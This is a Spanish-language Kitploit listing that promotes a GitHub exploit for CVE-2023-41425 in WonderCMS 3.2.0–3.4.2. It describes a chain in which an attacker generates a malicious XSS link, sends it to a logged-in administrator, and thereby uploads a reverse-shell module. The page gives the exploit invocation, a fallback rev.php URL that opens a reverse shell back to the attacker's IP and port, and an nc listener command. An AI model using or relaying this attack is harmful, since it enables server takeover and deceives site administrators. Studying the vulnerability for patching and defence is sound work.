Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — Inyección XSS, WonderCMS 3.2.0 -3.4.2 | Kitploit
Herramientas/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
Herramientas de PhishingGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-41425-WonderCMS-Authenticated-RCE

Inyección XSS, WonderCMS 3.2.0 -3.4.2

Ver Repositorio
1hace 1 añoAún no revisado

CVE-2023-41425-WonderCMS-RCE-Autenticado

Descripción

WonderCMS v3.2.0 - v3.4.2 es vulnerable. Los atacantes remotos pueden tomar el control total del servidor mediante una explotación de Cross-Site Scripting (XSS) (solo con fines educativos). Este es el plan:

Cómo funciona:

El exploit abusa del componente installModule de WonderCMS para introducir un script manipulado que ejecuta código arbitrario.

Configuración

  • Herramienta: exploit.py
  • Lo que necesitas:
    • URL de destino donde está instalado WonderCMS (no se requiere contraseña de administrador).
    • La IP de la máquina del atacante.
    • Un puerto para tu listener de reverse shell.

Ejecución paso a paso

  1. El script genera un archivo llamado xss.js. Esta arma JavaScript está diseñada para explotar XSS reflejado.
  2. Genera un enlace malicioso. Se lo enviarás al administrador.
  3. La magia ocurre cuando el administrador (un usuario con sesión iniciada) abre o hace clic en tu enlace:
  • Se realizan solicitudes en segundo plano sin su consentimiento.
  • Se sube un payload de reverse shell mediante la función de carga de temas/plugins.
  1. Una vez subido, el payload se ejecuta y te otorga una conexión reverse shell directa al servidor de destino.
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

Ejemplo

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

Plan de contingencia:

Si la reverse shell no se activa automáticamente, simplemente ve a:

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

nota:

Recuerda iniciar un listener con el siguiente comando:

root@kitploit:~
nc -lvp 4444

Créditos

prodigiousMind por descubrir y reportar la vulnerabilidad https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

Descargar herramienta